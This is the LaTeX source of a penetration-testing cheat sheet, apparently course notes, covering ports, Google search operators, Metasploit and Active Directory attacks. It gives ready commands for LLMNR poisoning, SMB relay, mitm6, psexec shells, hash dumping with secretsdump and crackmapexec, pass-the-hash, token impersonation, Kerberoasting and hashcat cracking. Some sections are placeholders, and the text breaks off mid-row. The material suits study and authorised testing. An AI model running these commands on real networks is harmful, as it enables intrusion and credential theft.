\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{gad} \pdfinfo{ /Title (peh-cheatsheat.pdf) /Creator (Cheatography) /Author (gad) /Subject (peh-cheatsheat Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{6936A3} \definecolor{LightBackground}{HTML}{F5F2F9} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{peh-cheatsheat Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{gad} via \textcolor{DarkBackground}{\uline{cheatography.com/183164/cs/38127/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}gad \\ \uline{cheatography.com/gad} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 31st May, 2023.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{3} \begin{tabularx}{5.377cm}{p{2.14011 cm} x{2.83689 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Ports}} \tn % Row 0 \SetRowColor{LightBackground} ftp & 21 \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} ssh & 22 \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} telnet & 23 \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} smtp & 25 \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} POP3 & 110 \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} IMAP & 143 \tn % Row Count 6 (+ 1) % Row 6 \SetRowColor{LightBackground} smb & 139, 445 \tn % Row Count 7 (+ 1) % Row 7 \SetRowColor{white} DNS & 53 \tn % Row Count 8 (+ 1) % Row 8 \SetRowColor{LightBackground} TFTP & 69 \tn % Row Count 9 (+ 1) % Row 9 \SetRowColor{white} SNMP & 161 \tn % Row Count 10 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{MISCELLANOUS}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Google Fu}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{use quotations to find only results that contain the text within the quotation marks.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}"Introduction to Cryptography"} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{use `site` keywork to only find results from a specific website.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Introduction to Cryptography site:stackexchange.com} \tn % Row Count 7 (+ 4) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{using the filetype keyword to search for specific file types.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Introduction to Cryptography -review filetype:pdf} \tn % Row Count 11 (+ 4) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{using the allintitle option to search the title of webpages for your provided keyword/text} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}allintitle:index of} \tn % Row Count 14 (+ 3) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{using the inurl option to search for the existence of a particular string in a url} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}inurl:admin site:someadminsite.com} \tn % Row Count 17 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{to get results that contain links/redirects to the example.com} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}link:example.com} \tn % Row Count 20 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{use the {\emph{ wildcard to do a wildcard search for results that have anything as the }} but must begin and end with "hack" and "VPN" respectively} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}"hack * VPN"} \tn % Row Count 24 (+ 4) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{to return results of websites that offer similar services to amazon.com , useful if you want to know other competitors for a particular service} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Dell Laptop related:amazon.com} \tn % Row Count 28 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{More of Google Fu here: \seqsplit{https://www.blackhat.com/presentations/bh-europe-05/BH\_EU\_05-Long.pdf}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{File transfers}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{sdsdf} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}sdsf} \tn % Row Count 2 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Spawing TTY shells}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{\{\{link="https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell"\}\}Link 1\{\{/link\}\}} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\{\{link="https://github.com/ahmetgurel/Pentest-Hints/blob/master/Spawning\%20a\%20TTY\%20Shell.md"\}\}Link 2\{\{/link\}\}} \tn % Row Count 6 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{More metasploit}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To search for metasploit modules within a metasploit module directory} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}search {\bf{/path/to/msf/module}} -t {\bf{search\_string}}\{\{nl\}\}search exploits/linux -t ftp`} \tn % Row Count 5 (+ 5) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Load metasploit plugins during a meterpreter session} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`load {\bf{plugin-name}}`} \tn % Row Count 8 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Get help on a plugin} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`help` \textgreater{}\textgreater{} scroll down} \tn % Row Count 10 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{ACTIVE DIRECTORY}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Gaining Initial Foothold}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Use Responder to capture NTLMv2 hashes via LLMNR poisoning} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}responder -I eth0 -r`} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Crack capture NTLMv2 hash with hashcat} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}hashcat -m 5600 ntlmhash.txt dictionary.txt`} \tn % Row Count 6 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Use nmap to enumerate domain for targets with SMB signing disabled} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}nmap -{}-script=smb2-security-mode.nse -p445 192.168.57.0/24`} \tn % Row Count 10 (+ 4) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{If SMB signing disabled, SMB Relay attack (likely) possible} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}SMB=Off and HTTP=Off and HTTPS=Off in `\{\{lang-plaintext\}\}/etc/responder/Responder.conf`} \tn % Row Count 14 (+ 4) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Then, use ntlmrelayx.py to relay hashes captured by responder to target computer to dump local SAM hashes.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}responder -I eth0 -r` then `\{\{lang-plaintext\}\}./ntlmrelayx -tf targets.txt -smb2support`} \tn % Row Count 20 (+ 6) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To get interactive SMB shell} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}./ntlmrelayx -tf targets.txt -smb2support -i`} \tn % Row Count 23 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Using psexec.py, smbexec.py or wmiexec.py for gaining shell access} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}./psexec.py \seqsplit{GOLD.local/jsnow:johnsnow@192.168.219.5`}} \tn % Row Count 27 (+ 4) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Using metasploit psexec} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}use windows/smb/psexec` \textgreater{}\textgreater{} set options \textgreater{}\textgreater{} `run`} \tn % Row Count 30 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Gaining Initial Foothold (cont)}} \tn % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Exploiting IPv6 to create an arbitrary domain user on domain via mitm6 attack} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}mitm6 -d GOLD.local` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}ntlmrelayx -6 -tf targets.txt -wh wpad.GOLD.local -l adlootdir`} \tn % Row Count 5 (+ 5) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Passback attack on MFP devices (e.g, printers)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}nc -L -p 389` on attack machine \textgreater{}\textgreater{} enumerate domain for MFPs \textgreater{}\textgreater{} login to MFP \textgreater{}\textgreater{} change LDAP server on MFP to attack IP \textgreater{}\textgreater{} capture hashes on attack machine} \tn % Row Count 10 (+ 5) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Sweep domain for MFP devices using metasploit's httpversion} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}To be edited} \tn % Row Count 13 (+ 3) % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Enumerate, Enumerate, Enumerate} \tn % Row Count 15 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post-Compromise Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To get the Resultant Group Policy config that has been applied on a host. This will output what GPO took precedence for a given config.} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`gpresult /h output.html`} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Find file shares on a domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Invoke-ShareFinder` OR `Find-DomainShare`} \tn % Row Count 6 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{{\bf{-{}-{}-{}-{}-{}-{}- Enumerating with PowerView -{}-{}-{}-{}-{}-{}-}}} \tn % Row Count 7 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Run PowerView} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`. .\textbackslash{}Powerview.ps1`} \tn % Row Count 9 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Get information about the domain (DCs IP, name, ...)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Get-NetDomain} \tn % Row Count 12 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Get information of DCs on the domain — domain name, IP of DC, DC OS, ...} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Get-NetDomainController} \tn % Row Count 15 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To get the Default Domain Policy configs} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Get-DomainPolicy`} \tn % Row Count 17 (+ 2) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Access complete values of any Powershell property name} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}(Get-DomainPolicy).name or Get-DomainPolicy | select name} \tn % Row Count 21 (+ 4) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Get information of users on the domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Get-NetUsers or Get-DomainUser} \tn % Row Count 23 (+ 2) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To fetch just one entity from Get-NetUsers, Get-NetGroups} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Get-NetUsers -Identity jsnow` or `Get-NetGroups -Identity "Domain Admins"`} \tn % Row Count 27 (+ 4) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Get all admins on a domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Get-NetGroup | Select-Object Name | Select-String "admin"` or `Get-DomainGroup | Select-Object Name, admincount | Select-String 1`} \tn % Row Count 31 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post-Compromise Enumeration (cont)}} \tn % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Get all users in a group} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Get-NetGroupMember -Identity "Enterprise Admins" -Recurse`} \tn % Row Count 3 (+ 3) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{{\bf{-{}-{}-{}-{}-{}-{}- Enumerating with BloodHound -{}-{}-{}-{}-{}-{}-}}} \tn % Row Count 4 (+ 1) % Row 13 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Default usage to collect mappings/data via the SharpHound.ps1 Ingestor (noisy option)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Invoke-BloodHound -Domain GOLD.local`} \tn % Row Count 7 (+ 3) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Perform more specific collection (less noisy). ? takes ff options: `Group`, `LocalGroup`, `RDP`, `Session`, `Trusts`, `ACL`, `ComputerOnly`} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Invoke-BloodHound -Domain GOLD.local -CollectionMethod ? -{}-ZipFilename output.zip} \tn % Row Count 12 (+ 5) % Row 15 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To collect Sessions currently active on the domain (users log in and out all the time)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`Invoke-BloodHound -CollectionMethod Session -Loop -LoopInterval HH:MM:SS -LoopDuration HH:MM:SS`} \tn % Row Count 17 (+ 5) % Row 16 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{After collection, import to Bloodhound GUI on kali} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`bloodhound`} \tn % Row Count 19 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Compromise Attacks}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Dumping SAM NTLM hashes on DC with secretsdump} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}./secretsdump.py -just-dc-ntlm \seqsplit{GOLD.local/domainadminuser:password@192.168.219.140`}} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Pass a password across a range of computer on the domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}crackmapexec smb 10.0.0.1/24 -d GOLD.local -u jsnow -p johnsnow`} \tn % Row Count 8 (+ 4) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Pass a hash across a range of computer on the domain} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}crackmapexec 10.0.0.5 -u jsnow -H {\bf{NThash}}`\{\{nl\}\}`-{}-local-auth` for local account login\{\{nl\}\}`-{}-sam` to dump sam hashes} \tn % Row Count 13 (+ 5) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Attempt to dump the (local) SAM while running Pass-the-password} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}crackmapexec smb 10.0.0.1/24 -d GOLD.local -u jsnow -p johnsnow -{}-sam`\{\{nl\}\}or`secretsdump.py -just-dc-ntlm \seqsplit{GOLD.local/jsnow:johsnow@10.0.0.1`}} \tn % Row Count 19 (+ 6) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To dump LSA secrets on target computer} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}crackmapexec smb 192.168.219.0/24 -d DOMAIN.local -u jsnow -p johnsnow -{}-lsa`} \tn % Row Count 23 (+ 4) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Crack NTLM hashes using hashcat} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}hashcat -m 1000 sam\_hashes.txt rockyou.txt`} \tn % Row Count 26 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Gain remote shell with NTLM hash using ps/smb/wmi-exec} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}./psexec.py win\_one:@10.0.0.5 -hashes {\bf{NTLMhash}}`} \tn % Row Count 30 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Compromise Attacks (cont)}} \tn % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Token Impersonation (TI) with metasploit} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}use windows/smb/exec` \textgreater{}\textgreater{} set options \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}run` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}load incognito` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}list\_tokens -u` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}impersonate\_token {\bf{DOMAIN}}*{\emph{username}}*`} \tn % Row Count 6 (+ 6) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Add new user via TI attack if impersonated token is admin} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}add\_user {\bf{username}} {\bf{password}}`} \tn % Row Count 10 (+ 4) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Add new (local) user via TI} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}add\_user {\bf{username}} {\bf{password}}`} \tn % Row Count 13 (+ 3) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Add local users to local groups} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}add\_local\_user {\bf{groupname}} {\bf{user\_to\_add}}`} \tn % Row Count 16 (+ 3) % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Performing Kerberoasting Attacks -{}- get a TGST} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}/GetUserSPNs.py \seqsplit{GOLD.local/jsnow:johnsnow} -dc-ip 192.168.219.140 -request`} \tn % Row Count 19 (+ 3) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Perform Kerberoasting with user's hash} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}/GetUserSPNs.py \seqsplit{GOLD.local/jsnow:johnsnow} -dc-ip 192.168.219.140 -hashes {\bf{NTLMhash}} -request`} \tn % Row Count 23 (+ 4) % Row 13 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Crack a TGST with hashcat} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}hashcat -m 13100 tgst.txt rockyou.txt -O`} \tn % Row Count 26 (+ 3) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{GPP/cPassword attack -{}- finding the `Groups.xml` file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plaintext\}\}smbclient -L \textbackslash{}\textbackslash{}\textbackslash{}*{\emph{\$DC-IP}}{\emph{\textbackslash{}\textbackslash{}SYSVOL -{}-user GOLD.local/jsnow\%johnsnow`\{\{nl\}\}`\{\{lang-plaintext\}\}prompt off` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}recurse on` \textgreater{}\textgreater{} `\{\{lang-plaintext\}\}mget }}`} \tn % Row Count 32 (+ 6) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Compromise Attacks (cont)}} \tn % Row 15 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Decrypting the cPassword obtain from `Groups.xml`} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 